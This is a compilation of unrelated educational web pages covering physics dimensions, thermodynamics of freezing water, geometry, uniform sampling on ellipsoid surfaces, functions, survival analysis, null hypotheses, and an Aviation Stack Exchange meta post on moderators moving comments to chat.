Dimension in physics generally means degrees of freedom, that is, how many independent directions you can move something.
For example on a straight line you can move back and forth in one direction, so we say the line has just one dimension. The same is true for a curve.
On a table-top we can move in two independent directions so we say that this is 2d. The same is true for the surface of a sphere.
In space, we can move in three different directions, so we say that it is 3d.
Sometimes time is said to be the 4th dimension, but note we can only move along it in just one direction and the way we move is fixed; so in this sense, it's not really a dimension.
Mathematically, all of the above is modelled by the notion of a manifold, which we say has dimension n when locally we can always move in n independent directions.
Despite what I said about time, after Einstein and especially after Minkowski, we usually model spacetime as a 4d manifold.
• "Different directions" is not quite the right way to say it. I can slide an object on a table top in an infinite number of different directions. But if you ask me where the object is on the table top, there is no way I can assign a single unique number to each distinct location. I have to report two numbers to tell you where the object is. And in free space, I have to report three numbers. – Solomon Slow Jan 25 '18 at 21:31
• @jameslarge: sure, that's why I said 'independent directions'; I just didn't emphasise it. There's more to dimension than just 'three numbers' - if I had a bag with apples, oranges and pears I could assign a triple of numbers to the bag that tells me how many of each there are; and if I put two bags together then I get an addition law. But this example is far from what we mean by dimension, at least geometrically. – Mozibur Ullah Jan 25 '18 at 21:32
• "there is no way I can assign a single unique number to each distinct location" - Technically you can, since $\mathbb{R}$ is equipollent to $\mathbb{R}^n$ for any positive integer $n$. However, there's no point-to-real-number assignment that satisfies some nice properties familiar to differential geometers. – J.G. Jan 25 '18 at 21:36
Let's say someone invites you to a party in their apartment. You need to know how far to go North to get there, and how far East, and how many floors up, which covers the three dimensions of space. But you also need to know when the party is.
• Wouldn't this also include when "now" is? So this would add perspective in. Which that would mean both perspective and time are variables in the fourth dimension. Thanks for the explanation, makes things a lot easier on my tiny brain! :) – Konix25 Jan 25 '18 at 20:44
• @Konix25 If the invitation says that the party starts at 7:30pm, then it starts at 7:30pm. The start time won't change depending on whether I read the invitation at noon or at 6:42. What does matter though, is that to correctly understand what "7:30pm" means, I have to know in what time zone the "7:30" is based. Mathematically speaking, I have to know the origin of the coordinate system. – Solomon Slow Jan 25 '18 at 21:36
Yours isn't a physics question. Since this is a physics forum however I'll answer in physics terms.
In physics, one dimension means a straight line. You only need one coordinate to specify it - for example with the horizontal axis, you only need to know how many units a point is before or after the origin to know where it is. Two dimensions is a plane. In the x-y plane, you need to know both the x-coordinate and the y-coordinate to know unambiguously where a point is. Three dimensions is the world we're familiar with. You not only need to know the x-coordinate and the y-coordinate, you also need to know how high a point is above the plane.
Time is the 4th dimension in Relativity, and it's related to the other three dimensions but has a minus sign. In Minkowski space (Special Relativity), the metric is:
$ds^2 = -dt^2 + dx^2 + dy^2 + dz^2$
Here $t$ is time, and $x, y, z$ are spatial coordinates. If you don't recognize this formula don't worry about it, but the point is that these things are being added. This isn't always possible - adding time to energy for example makes no sense. The fact that we can add these means that we can treat time and space on an equal footing. However they're also not equivalent - there's a minus sign between the two that no sleight-of-hand could ever conjure away.
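As a small illustration (not part of the original answer), the interval between two events can be computed directly from this metric in units where $c = 1$; the sample events below are made up:

```python
# Spacetime interval ds^2 = -dt^2 + dx^2 + dy^2 + dz^2 (units with c = 1)
def interval_squared(e1, e2):
    dt, dx, dy, dz = (b - a for a, b in zip(e1, e2))
    return -dt**2 + dx**2 + dy**2 + dz**2

# Events are (t, x, y, z). ds^2 < 0: timelike; ds^2 > 0: spacelike; 0: lightlike.
print(interval_squared((0, 0, 0, 0), (2, 1, 0, 0)))  # -3, a timelike separation
```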
There are ongoing searches for additional spatial dimensions, and some theories such as superstring theory require ten spacetime dimensions in total, but no extra dimensions have been found yet.
• Your physics terms are much appreciated, I don't mind what kind of response it is as long as it betters my understanding of the idea behind a fourth dimension. Thank you <3 – Konix25 Jan 29 '18 at 22:50
https://www.physicsforums.com/threads/a-problem-from-thermodynamics-freezing-of-water-at-273-k-and-1-atm.869195/
|
A problem from thermodynamics -- Freezing of water at 273 K and 1 atm
Homework Statement
Freezing of water at 273 K and 1 atm
Which of the following is true for the above thermodynamic process?
p) q = 0
q) w = 0
r) ΔSsys < 0
s) ΔU = 0
t) ΔG = 0
none
The Attempt at a Solution
I got r, s, t.
Since the process happens at constant temperature, I assumed internal energy is constant.
Since the system is open to the atmosphere, the process is isobaric, and since the volume changes due to the phase change, the work done is not zero, so heat must be exchanged (first law of thermodynamics).
Randomness decreases, so ΔSsys < 0.
But the answer given is r, t, q.
Andrew Mason
Homework Helper
##\Delta U## includes potential energy. In order to form ice, the water molecules lose potential energy and rotational kinetic energy. Average translational kinetic energy does not change (i.e. temperature) but average potential energy per molecule decreases and there is loss of rotational kinetic energy. The process is exothermic (heat flows out of the water to form ice).
Since ##\Delta Q < 0##, ##\Delta S = \int dQ/T = \Delta Q/T < 0##.
Since P and T are constant, ##\Delta G = \Delta H - T\Delta S = Q - T\Delta S = T\Delta S - T\Delta S = 0##
I am not sure about w = 0, however. Ice takes up more volume than liquid water (which is why ice floats). So there is a small amount of work done on the surroundings.
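A back-of-the-envelope check of that last statement (not part of the original reply; the densities are approximate textbook values near 273 K):

```python
# Work done by 1 mol of water on the surroundings as it freezes at 1 atm:
# w_by_system = P * (V_ice - V_water), positive because ice expands.
m = 18.02                           # g of water per mol
rho_water, rho_ice = 1.000, 0.917   # g/cm^3, approximate values at 273 K
dV = (m / rho_ice - m / rho_water) * 1e-6   # volume change in m^3
P = 101325.0                        # Pa (1 atm)
print(P * dV)                       # ~0.17 J: small, but nonzero, so w != 0
```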
[later edits are in italics]
AM
Thank you very much sir, understood it.
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/chapter-6-polygons-and-quadrilaterals-6-3-proving-that-a-quadrilateral-is-a-parallelogram-practice-and-problem-solving-exercises-page-372/12
|
Geometry: Common Core (15th Edition)
$x = 13$
In a parallelogram, opposite angles are congruent, so we set the opposite angles equal to one another and solve for $x$:
$x + 38 = 4x - 1$
Subtract $38$ from each side to isolate the constants: $x = 4x - 39$
Subtract $4x$ from each side to isolate the variable: $-3x = -39$
Divide each side by $-3$ to solve for $x$: $x = 13$
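The same steps can be checked symbolically; a quick sketch using SymPy (the code is an illustration, not part of the textbook solution):

```python
from sympy import Eq, solve, symbols

x = symbols("x")
# opposite angles of a parallelogram are congruent
print(solve(Eq(x + 38, 4 * x - 1), x))  # [13]
```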
https://math.stackexchange.com/questions/973101/how-to-generate-points-uniformly-distributed-on-the-surface-of-an-ellipsoid
|
# How to generate points uniformly distributed on the surface of an ellipsoid?
I am trying to find a way to generate random points uniformly distributed on the surface of an ellipsoid.
If it was a sphere there is a neat way of doing it: Generate three $N(0,1)$ variables $\{x_1,x_2,x_3\}$, calculate the distance from the origin
$$d=\sqrt{x_1^2+x_2^2+x_3^2}$$
and calculate the point
$$\mathbf{y}=(x_1,x_2,x_3)/d.$$
It can then be shown that the points $\mathbf{y}$ lie on the surface of the sphere and are uniformly distributed on it, and the argument that proves it is just one word, "isotropy". No preferred direction.
Suppose now we have an ellipsoid
$$\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}=1$$
How about generating three $N(0,1)$ variables as above, calculate
$$d=\sqrt{\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}}$$
and then using $\mathbf{y}=(x_1,x_2,x_3)/d$ as above. That way we get points guaranteed to lie on the surface of the ellipsoid, but will they be uniformly distributed? How can we check that?
Any help greatly appreciated, thanks.
PS I am looking for a solution without accepting/rejecting points, which is kind of trivial.
EDIT:
Switching to polar coordinates, the surface element is $dS=F(\theta,\phi)\ d\theta\ d\phi$ where $F$ is expressed as $$\frac{1}{4} \sqrt{r^2 \left(16 \sin ^2(\theta ) \left(a^2 \sin ^2(\phi )+b^2 \cos ^2(\phi )+c^2\right)+16 \cos ^2(\theta ) \left(a^2 \cos ^2(\phi )+b^2 \sin ^2(\phi )\right)-r^2 \left(a^2-b^2\right)^2 \sin ^2(2 \theta ) \sin ^2(2 \phi )\right)}$$
• I might have the wrong idea... you could generate a set of points uniformly on the sphere $\mathbb{S}^{2} \subset \mathbb{R}^{3}$. Let $\left\{ c_{1},\ldots,c_{N} \right\}$ be this set of points. Then the mapping $\displaystyle \begin{bmatrix} x \\ y \\ z \end{bmatrix} \, \longmapsto \, \begin{bmatrix} ax \\ by \\ cz \end{bmatrix}$ maps a point $c_{i}$ on the sphere to a point on the ellipsoid. – jibounet Oct 20 '14 at 12:55
• @jibounet Your solution would transform a uniform distribution over the ball volume into a uniform distribution over the ellipsoid volume; on surfaces, however, it will fail. Consider a very, very long cigar-like ellipsoid ($a\gg b = c = 1$): the density at the cigar's tip ($x\approx \pm a$) will be close to that of the unit sphere, but the density at $x\approx 0$ will decrease as $1/a$ relative to that on the sphere. – CiaPan Oct 20 '14 at 13:16
• Hm... the sphere can be parametrized as $\mathbf{F}(u,v)$, polar coordinates or whatever, and the surface element can be calculated using the first fundamental form as $dS=H(u,v)\ du\ dv$. How would that transform under your diagonal transformation? If it's something simpler we are getting close! – Georgy Oct 20 '14 at 13:18
• @CiaPan : You're right. I guess we could use the same method as here : mathworld.wolfram.com/SpherePointPicking.html with the parametrization of the ellipsoid instead on the parametrization of the sphere, right ? – jibounet Oct 20 '14 at 13:21
• @jibounet: I don't think this calc can go through because in the case of the sphere the surface element is proportional to the solid angle element which is not the case for the ellipsoid. – Georgy Oct 20 '14 at 13:30
One way to proceed is to generate a point uniformly on the sphere, apply the mapping $f : (x,y,z) \mapsto (x'=ax,y'=by,z'=cz)$ and then correct the distortion created by the map by discarding the point randomly with some probability $p(x,y,z)$ (after discarding you restart the whole thing).
When we apply $f$, a small area $dS$ around some point $P(x,y,z)$ will become a small area $dS'$ around $P'(x',y',z')$, and we need to compute the multiplicative factor $\mu_P = dS'/dS$.
I need two tangent vectors around $P(x,y,z)$, so I will pick $v_1 = (dx = y, dy = -x, dz = 0)$ and $v_2 = (dx = z,dy = 0, dz=-x)$
We have $dx' = adx, dy'=bdy, dz'=cdz$ ; $Tf(v_1) = (dx' = adx = ay = ay'/b, dy' = bdy = -bx = -bx'/a,dz' = 0)$, and similarly $Tf(v_2) = (dx' = az'/c,dy' = 0,dz' = -cx'/a)$
(we can do a sanity check and compute $x'dx'/a^2+ y'dy'/b^2+z'dz'/c^2 = 0$ in both cases)
Now, $dS = v_1 \wedge v_2 = (y e_x - xe_y) \wedge (ze_x-xe_z) = x(y e_z \wedge e_x + ze_x \wedge e_y + x e_y \wedge e_z)$ so $|| dS || = |x|\sqrt{x^2+y^2+z^2} = |x|$
And $dS' = (Tf \wedge Tf)(dS) = ((ay'/b) e_x - (bx'/a) e_y) \wedge ((az'/c) e_x-(cx'/a) e_z) = (x'/a)((acy'/b) e_z \wedge e_x + (abz'/c) e_x \wedge e_y + (bcx'/a) e_y \wedge e_z)$
And finally $\mu_{(x,y,z)} = ||dS'||/||dS|| = \sqrt{(acy)^2 + (abz)^2 + (bcx)^2}$.
It's quick to check that when $(x,y,z)$ is on the sphere the extrema of this expression can only happen at one of the six "poles" ($(0,0,\pm 1), \ldots$). If we suppose $0 < a < b < c$, its minimum is at $(0,0,\pm 1)$ (where the area is multiplied by $ab$) and the maximum is at $(\pm 1,0,0)$ (where the area is multiplied by $\mu_{\max} = bc$)
The smaller the multiplication factor is, the more we have to remove points, so after choosing a point $(x,y,z)$ uniformly on the sphere and applying $f$, we have to keep the point $(x',y',z')$ with probability $\mu_{(x,y,z)}/\mu_{\max}$.
Doing so should give you points uniformly distributed on the ellipsoid.
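A minimal NumPy sketch of the scheme just described; the function name is mine, and the general-case normalizer $\mu_{\max} = \max(ab, ac, bc)$ reduces to $bc$ when $0 < a < b < c$:

```python
import numpy as np

def sample_ellipsoid_surface(a, b, c, n, rng=None):
    """Return n points uniformly distributed on x^2/a^2 + y^2/b^2 + z^2/c^2 = 1."""
    rng = np.random.default_rng() if rng is None else rng
    mu_max = max(a * b, a * c, b * c)
    points = []
    while len(points) < n:
        v = rng.normal(size=3)
        x, y, z = v / np.linalg.norm(v)       # uniform point on the unit sphere
        # area-distortion factor of f(x,y,z) = (ax,by,cz) at this point
        mu = np.sqrt((a * c * y) ** 2 + (a * b * z) ** 2 + (b * c * x) ** 2)
        if mu_max * rng.uniform() <= mu:      # keep with probability mu / mu_max
            points.append((a * x, b * y, c * z))
    return np.array(points)
```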
• If e.g. $b\gg a$ and $c\gg a$, we only keep a small fraction of the points generated. I was originally hoping to come up with a solution without rejecting points, but now it seems an impossible task. And of all the methods presented so far, yours is the simplest and most direct. – Georgy Oct 21 '14 at 10:31
• A direct method would need to compute the function $x \mapsto$area to the left of the $X=x$ plane, and then invert that function. I haven't checked at all if either step is easy or not (I would guess they are not) – mercio Oct 21 '14 at 10:41
• I have looked into that and it comes down to inverting a function that involves elliptic functions, so it can only be done numerically by some root finding procedure. – Georgy Oct 21 '14 at 12:32
• One other thing is your choice of $v_1$ and $v_2$. They are not orthogonal (do they have to be?) and not unit vectors. They are just two vectors in the tangent plane. So in the cross product you get the direction right but what about the magnitude? That depends also on the angle between them. If you had chosen another set of vectors spanning the tangent plane we 'd have a different result, no ? – Georgy Oct 21 '14 at 12:43
• @CookieMaster It is called a wedge product, or exterior product. The important computation rule is $a \wedge b = - b \wedge a$. And then you still use the euclidean norm, except that now you have $n(n-1)/2$ coordinates to sum. I would expect that the probability in the end still is (smallest axis)/(largest axis) but I could be wrong – mercio Feb 1 '18 at 17:20
Not sure if this is the same answer as @jibounet's, but what if you use the normal-distribution method, as you propose, but with the squares of the respective semi-axes as the variances, and then scale using $d$, as proposed? Empirically this does not look more bunched (at least to me) at the "cigar poles" than a brute-force selection from uniformly distributed points in $\mathbb{R}^3$.
So, the method is generate random variables:
$$x_1 \sim N(0,a^2)$$ $$x_2 \sim N(0,b^2)$$ $$x_3 \sim N(0,c^2)$$
Then the rest is as suggested:
$$d=\sqrt{\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}}$$
and use points $\mathbf{y}=(x_1,x_2,x_3)/d$
The proof of the original spherical selection is simply that normal distributions are radially symmetric? Does that not still apply with unequal variances?
• I agree that it does not look clustered – Makogan Mar 15 '18 at 22:36
Idea for an approximate solution: divide the ellipsoid into small enough, flat enough quasi-rectangles $P_i$, and choose an almost-area-preserving parametrization of each piece: $$f_i:R_i\longrightarrow P_i$$ with $R_i\subset\Bbb R^2$ a rectangle. Choose an index $j$ randomly with probability $\text{area}(R_j)/\sum_i\text{area}(R_i)$, choose a uniform point in $R_j$, and finally apply $f_j$.
https://www.houseofmath.com/drill/functions/what-is-a-function
|
# What Is a Function?
A function tells you the relationship between two variables. You can think of a function as a number machine: you put a number into the function, and you get another one in return. You can specify a function in three different ways: as an expression, as a table, and as a graph.
An example of a function is
$y=x+2$
Here, $x$ is a number of your own choosing. That’s why $x$ is known as the independent variable. For each number you choose $x$ to be, $y$ becomes a different number. That’s why $y$ is called the dependent variable, and we say that $y$ is dependent on $x$. The definition of a function is that for each value of $x$, there’s only one value of $y$.
It’s also common to give the functions their own names. Because the word “function” begins with the letter “$f$”, you typically call your first function $f$. Directly after the name, we write the independent variable in parentheses. Since you’re mostly working with functions that are dependent on $x$, we set the function’s name to be $f\left(x\right)$ (which is read as “$f$ of $x$”). If there are several functions in the same exercise, each of them gets their own name. We have already used $f$, so we skip to the next letter in the alphabet and call the next function $g\left(x\right)$, and the next one $h\left(x\right)$, and so on. We can therefore write the function above as
$f\left(x\right)=x+2$
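Read as a "number machine", the same function is one line of code; a Python illustration (not part of the original page):

```python
def f(x):
    # one output for every input x: the defining property of a function
    return x + 2

print(f(1), f(5))  # 3 7
```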
https://zbmath.org/?q=an:1259.65210
|
# zbMATH — the first resource for mathematics
Numerical solutions to fractional perturbed Volterra equations. (English) Zbl 1259.65210
Summary: A class of perturbed Volterra equations of convolution type with three kernel functions is considered. The kernel functions $g_\alpha = t^{\alpha - 1}/\Gamma(\alpha)$, $t > 0$, $\alpha \in [1, 2]$, correspond to the class of equations interpolating heat and wave equations. The results obtained generalize our previous results from 2010.
##### MSC:
65R20 Integral equations (numerical methods)
45D05 Volterra integral equations
45E10 Integral equations of the convolution type
26A33 Fractional derivatives and integrals (real functions)
https://math.gatech.edu/seminars-and-colloquia-by-series?series_tid=29
|
## Seminars and Colloquia by Series
Wednesday, September 4, 2019 - 13:55, Location: Skiles 005, University of Crete, Organizer:
Wednesday, April 10, 2019 - 13:55, Location: Skiles 005, Georgia Tech, Organizer: Josiah Park
When equiangular tight frames (ETFs), a type of structured optimal packing of lines, exist and are of size $|\Phi|=N$, $\Phi\subset\mathbb{F}^d$ (where $\mathbb{F}=\mathbb{R}$, $\mathbb{C}$, or $\mathbb{H}$), then for $p > 2$ the so-called $p$-frame energy $E_p(\Phi)=\sum\limits_{i\neq j} |\langle \varphi_{i}, \varphi_{j} \rangle|^p$ achieves its minimum value on an ETF over all size-$N$ collections of unit vectors. These energies have potential functions which are not positive definite when $p$ is not even, and in these cases the problem of describing the minimizers appears genuinely complex. While there are several open questions about the structure of these sets for fixed $N$ and fixed $p$, we focus on another question:
What structural properties are expressed by minimizing probability measures for the quantity $I_{p}(\mu)=\int\limits_{\mathbb{S}_{\mathbb{F}}^{d-1}}\int\limits_{\mathbb{S}_{\mathbb{F}}^{d-1}} |\langle x, y \rangle|^p d\mu(x) d\mu(y)$?
We collect a number of surprising observations. Whenever a tight spherical or projective $t$-design exists for the sphere $\mathbb{S}_{\mathbb{F}}^d$, equally distributing mass over it gives a minimizer of the quantity $I_{p}$ for a range of $p$ between consecutive even integers associated with the strength $t$. We show existence of discrete minimizers for several related potential functions, along with conditions which guarantee emptiness of the interior of the support of minimizers for these energies.
This talk is based on joint work with D. Bilyk, A. Glazyrin, R. Matzke, and O. Vlasiuk.
Wednesday, April 3, 2019 - 13:55 , Location: Skiles 005 , Alex Stokolos , Georgia Southern , Organizer: Galyna Livshyts
In this talk we will discuss some extremal problems for polynomials. Applications to problems in discrete dynamical systems as well as in geometric complex analysis will be suggested.
Wednesday, March 27, 2019 - 13:55, Location: Skiles 005, University of Minnesota, Organizer: Galyna Livshyts
Many problems of spherical discrete and metric geometry may be reformulated as energy minimization problems and require techniques that stem from harmonic analysis, potential theory, optimization, etc. We shall discuss several such problems, as well as applications of these ideas to combinatorial geometry, discrepancy theory, signal processing, etc.
Wednesday, March 13, 2019 - 13:55, Location: Skiles 005, Ursinus College, Organizer: Galyna Livshyts
The Bishop-Phelps-Bollobás property for numerical radius says that if we have a point in the Banach space and an operator that almost attains its numerical radius at this point, then there exist another point close to the original point and another operator close to the original operator such that the new operator attains its numerical radius at this new point. We will show that the set of bounded linear operators from a Banach space X to X has the Bishop-Phelps-Bollobás property for numerical radius whenever X is $\ell_1$ or $c_0$. We will also discuss some constructive versions of the Bishop-Phelps-Bollobás theorem for $\ell_1(\mathbb{C})$, which are an essential tool for the proof of this result.
Wednesday, March 6, 2019 - 13:55 , Location: Skiles 005 , Hong Wang , MIT , Organizer: Shahaf Nitzan
If $f$ is a function supported on a truncated paraboloid, what can we say about $Ef$, the Fourier transform of f? Stein conjectured in the 1960s that for any $p>3$, $\|Ef\|_{L^p(R^3)} \lesssim \|f\|_{L^{\infty}}$.
We make a small progress toward this conjecture and show that it holds for $p> 3+3/13\approx 3.23$. In the proof, we combine polynomial partitioning techniques introduced by Guth and the two ends argument introduced by Wolff and Tao.
Wednesday, February 27, 2019 - 13:55 , Location: Skiles 005 , Anna Skripka , University of New Mexico , Organizer: Galyna Livshyts
Linear Schur multipliers, which act on matrices by entrywise multiplications, as well as their generalizations have been studied for over a century and successfully applied in perturbation theory. In this talk, we will discuss extensions of Schur multipliers to multilinear infinite-dimensional transformations and then look into applications of the latter to approximation of operator functions.
Wednesday, February 20, 2019 - 13:55 , Location: Skiles 005 , Steven Heilman , USC , Organizer: Galyna Livshyts
It is well known that a Euclidean set of fixed Euclidean volume with least Euclidean surface area is a ball. For applications to theoretical computer science and social choice, an analogue of this statement for the Gaussian density is most relevant. In such a setting, a Euclidean set with fixed Gaussian volume and least Gaussian surface area is a half space, i.e. the set of points lying on one side of a hyperplane. This statement is called the Gaussian Isoperimetric Inequality. In the Gaussian Isoperimetric Inequality, if we restrict to sets that are symmetric (A = -A), then the half space is eliminated from consideration. It was conjectured by Barthe in 2001 that round cylinders (or their complements) have smallest Gaussian surface area among symmetric sets of fixed Gaussian volume. We discuss our result that says this conjecture is true if an integral of the curvature of the boundary of the set is not close to 1. https://arxiv.org/abs/1705.06643 http://arxiv.org/abs/1901.03934
Wednesday, February 13, 2019 - 13:55 , Location: Skiles 005 , Michael Loss , Georgia Tech , Organizer: Shahaf Nitzan
In this talk I present some variational problems of Aharonov-Bohm type, i.e., they include a magnetic flux that is entirely concentrated at a point. This is perhaps the simplest example of a variational problem for systems, the wave function being necessarily complex. The functional is rotationally invariant, and the issue to be discussed is whether the optimizers have this symmetry or whether it is broken.
Wednesday, February 6, 2019 - 13:55 , Location: Skiles 005 , Dario Alberto Mena , University of Costa Rica , Organizer: Galyna Livshyts
We prove sparse bounds for the spherical maximal operator of Magyar, Stein and Wainger. The bounds are conjecturally sharp, and contain an endpoint estimate. The new method of proof is inspired by ones by Bourgain and Ionescu, is very efficient, and has not been used in the proof of sparse bounds before. The Hardy-Littlewood circle method is used to decompose the multiplier into major and minor arc components. The efficiency arises as one only needs a single estimate on each element of the decomposition.
https://econometricsense.blogspot.com/2012/04/survival-analysis.html
|
## Thursday, April 19, 2012
### Survival Analysis
Let ‘T’ be a random variable giving the time to an event. The distribution of ‘T’ can be described by the density f(t), the cumulative distribution function F(t) = P(T ≤ t), and the survival function S(t) = 1 − F(t).
The hazard function h(t) = f(t)/S(t) is a conditional density giving the instantaneous risk that the event will occur at time ‘t’, given survival up to ‘t’.
Using R, crude plots of f(t), F(t), S(t), and h(t) for λ = 0.5 are given below:
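The original R plots did not survive extraction, so here is a rough Python sketch of the same four curves. For a constant hazard h(t) = λ the event time is exponential, so S(t) = exp(−λt), f(t) = λ exp(−λt), and F(t) = 1 − exp(−λt):

```python
import numpy as np
import matplotlib.pyplot as plt

lam = 0.5
t = np.linspace(0, 10, 200)
curves = {
    "f(t)": lam * np.exp(-lam * t),   # density
    "F(t)": 1 - np.exp(-lam * t),     # cumulative distribution
    "S(t)": np.exp(-lam * t),         # survival function, 1 - F(t)
    "h(t)": np.full_like(t, lam),     # hazard f(t)/S(t), constant here
}
fig, axes = plt.subplots(2, 2)
for ax, (name, y) in zip(axes.flat, curves.items()):
    ax.plot(t, y)
    ax.set_title(name)
plt.show()
```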
If we let the baseline hazard be a constant, h(t) = λ0, so that ln h(t) = ln(λ0) = μ, we can easily extend the model to include covariates:
h(t) = λ0(t) exp(β1X1 + β2X2)
ln h(t) = ln[λ0(t) exp(β1X1 + β2X2)]
= ln λ0(t) + ln[exp(β1X1 + β2X2)]
= μ + β1X1 + β2X2
Note: if X1 = X2 = 0, we recover the baseline hazard.
Cox Proportional Hazards Model
If we specify the hazard for two individuals i and i′:
hi(t) = λ0(t) exp(β1X1i + β2X2i)
hi′(t) = λ0(t) exp(β1X1i′ + β2X2i′)
Then the proportional hazard for individual i relative to i′ can be written as:
hi(t)/hi′(t) = λ0(t) exp(β1X1i + β2X2i) / [λ0(t) exp(β1X1i′ + β2X2i′)]
With the ‘baseline’ hazard term cancelling out we get:
hi(t)/hi′(t) = exp[β1(X1i − X1i′) + β2(X2i − X2i′)], i.e. e^(ζi − ζi′)
As a result, we don’t have to explicitly know the functional form of the baseline hazard to calculate the proportional hazard.
Partial Likelihood Estimation
The parameters for the proportional hazard model are estimated via partial likelihood estimation.
Introducing a censoring indicator ‘ci’ (= 0 if the observation is censored at its event time, 1 otherwise), we can express the full likelihood as:
L(β) = Πi [hi(ti)]^ci Si(ti)
Instead of maximizing the full likelihood above, Cox proposed maximizing the partial likelihood, which does not involve the baseline hazard function:
Lp(β) = Π{i: ci = 1} exp(xi'β) / Σ{j in R(ti)} exp(xj'β)
The risk set R(ti) contains the subjects at risk for the event at time ‘ti’, the time at which the event was observed for subject ‘i’; censoring times are excluded from the product. Based on the Cox model, the hazard is proportional to exp(xi'β), so the ratio in the partial likelihood represents the hazard for subject ‘i’ relative to the summed hazard of all subjects at risk at the time subject ‘i’ experienced the event. The estimates for β are obtained by maximizing Lp(β).
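As an illustration of that ratio (a minimal NumPy sketch, not from the original post; ties are handled in the simplest way, by putting all tied subjects in the risk set):

```python
import numpy as np

def cox_partial_loglik(beta, times, events, X):
    """log Lp(beta) = sum over observed events of
    x_i'beta - log( sum_{j in R(t_i)} exp(x_j'beta) )."""
    eta = X @ np.asarray(beta)          # linear predictors x_i'beta
    loglik = 0.0
    for i in np.flatnonzero(events):    # censored times contribute no factor
        at_risk = times >= times[i]     # risk set R(t_i)
        loglik += eta[i] - np.log(np.exp(eta[at_risk]).sum())
    return loglik
```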
http://nila.lecture.ub.ac.id/2014/01/
|
## Null Hypothesis
After almost a year of supervising students conducting research and writing their final theses, I found that students tend to forget how to test hypotheses. First, students forget to choose the null hypothesis and the alternative before the sample is drawn. According to Kothari (2004), doing so protects the researcher from the error of deriving hypotheses from the data that he collects and then testing the hypotheses on the same data. Please keep these considerations in mind when choosing the null hypothesis.
1. The null hypothesis is the one which the researcher wishes to disprove; the alternative hypothesis is the one which the researcher wishes to prove. Hence, the null hypothesis represents the hypothesis we attempt to reject, and the alternative hypothesis represents all other possibilities.
2. If the rejection of a certain hypothesis when it is actually true involves great risk, the researcher must take it as the null hypothesis, because the probability of rejecting the hypothesis when it is true is α (the level of significance), which is chosen to be very small.
3. The null hypothesis should be simple and specific; it should not state that a parameter is ‘about’ or ‘approximately’ a certain value. For example, µ = µH0 is a specific null hypothesis, while µ > µH0, µ < µH0, and µ ≠ µH0 are composite or nonspecific (alternative) hypotheses.
Second, students forget that the hypothesis they actually test is the null hypothesis; it is the one we try to reject. Students mostly derive hypotheses from assumptions, as they are convinced by theories and guided by the findings of prior studies. These assumptions lead them to construct hypotheses that they wish to accept, not reject, and they forget to reverse the statement and develop the null hypothesis. Instead, students test the hypothesis they desire to accept, the one consistent with theories and prior studies.
A study proceeds with hypothesis testing on the basis of the null hypothesis, while keeping the alternative hypothesis in mind. According to Kothari (2004), this is because, on the assumption that the null hypothesis is true, one can assign probabilities to the different possible sample results; this cannot be done if we proceed from the alternative hypothesis.
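For instance, a test of the null hypothesis µ = µH0 against the two-sided alternative µ ≠ µH0 takes a few lines with SciPy; the sample values here are made up:

```python
import numpy as np
from scipy import stats

sample = np.array([5.1, 4.8, 5.6, 5.0, 4.7, 5.3])  # hypothetical data
alpha, mu0 = 0.05, 5.0                             # H0: mu = mu0
t_stat, p_value = stats.ttest_1samp(sample, popmean=mu0)
# We test (and possibly reject) the null hypothesis, never "accept" it.
print("reject H0" if p_value < alpha else "fail to reject H0")
```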
Reference: C. R. Kothari (2004), Research Methodology: Methods and Techniques, New Age International Publishers, India.
https://aviation.meta.stackexchange.com/questions/3408/can-removing-comments-by-a-moderator-on-their-own-answer-be-considered-a-conflic
|
# Can removing comments by a moderator on their own answer be considered a conflict of interest?
Referring to this question and this question. Both were answered by a moderator. Both answers attracted a lot of comments asking for clarifications and pointing out potential flaws.
In both cases the comments were moved to chat by the moderator who provided the answer, thereby removing them from immediate view, with a use-by date after which the chat is marked inactive. The chat is only visible to people who click on the chat link, and while reading the chat the original question/answer is not visible.
This is my understanding of the use and value of comments: comments underneath an answer or question are immediately visible to anyone looking up the question/answer, and they provide context. A good comment is relevant to the contents of the question or answer. When clarifications are asked for or faults pointed out, the poster can either incorporate the reaction into the answer, when they reckon it adds value for everyone, or leave it in a comment. A set of comments, good or bad, forms a frame of reference for the different viewpoints of the people using the site.
On the other hand, long and prolonged discussions between two or three parties are often boring for the rest of us, and take away from the value of the post. So there are pros and cons to a long set of comments, that is understood.
The issue here though is a potential conflict of interest. Only moderators can remove everyone's comments from posts; the rest of us need to live with them, whether valuable or not. Moderators could potentially leave a flawed answer and remove critical comments from it. Please note that I say potentially.
We have more than one moderator, although sometimes it does not seem that way. Would a possible solution be for another moderator to judge whether a multitude of comments on a moderator's own post should be hidden from immediate reference in a chat room?
EDIT
There have been some up-voted comments on this post, a way for the community to express what they think about my question. However, I won't be responding in the comments, since they may be removed at any time, as @Jamiec points out.
So I won't add another comment but will edit this into the question.
@Jamiec: "If its in a comment, its transient, and might be removed at any time"
• Why at a time when the question is still highly active?
• And more importantly: why by the person who may have a direct vested interest? If it appears so, why not handle things in a way that removes that appearance.
• Comments are generally meant to be ephemeral in the Stack model anyhow -- if they're that valuable to the answer, their content should be edited into the answer. Nov 21, 2017 at 2:49
• @UnrecognizedFallingObject Sure. Would you consider changing your comment to an answer? Nov 21, 2017 at 3:59
• FWIW, had I seen those long comment threads (and the associated flags) I would have also moved them to chat. That is the agreed process, and the reason why there is a shortcut for it in the mod tooling.
– Jamiec Mod
Nov 21, 2017 at 9:19
• @Jamiec FWIW? If it's put in a comment, it is worth nothing. Nov 21, 2017 at 9:43
• @Koyovis Nowhere does it say "If its in a comment its worth nothing". What it says is "If its in a comment, its transient, and might be removed at any time".
– Jamiec Mod
Nov 21, 2017 at 11:14
• @Jamiec Yes, I have read that. That is not what the question is about; it is signalling a potential conflict of interest. If I post a flawed answer that attracts multiple comments pointing out flaws, I do not have the option to remove them all. Nov 22, 2017 at 6:36
I am not a mod on this site, but this is a topic that does come up on other sites, including those I am a mod on so I have a few years' experience in this space.
In general, while it is standard to remove comments, as anything of value in them should be incorporated into the question or answer, mods will usually leave this action to another mod just to avoid any perception of a conflict of interest.
However, if that is unlikely to be timely, or if there are numerous flags, any mod will do it. The thing to remember is that mod actions are very visible to other mods, and to CMs and SE staff, which does keep us all honest, and we typically are driven in the first instance by flags from the community so we know the action is requested.
## Edit it in if it's that valuable
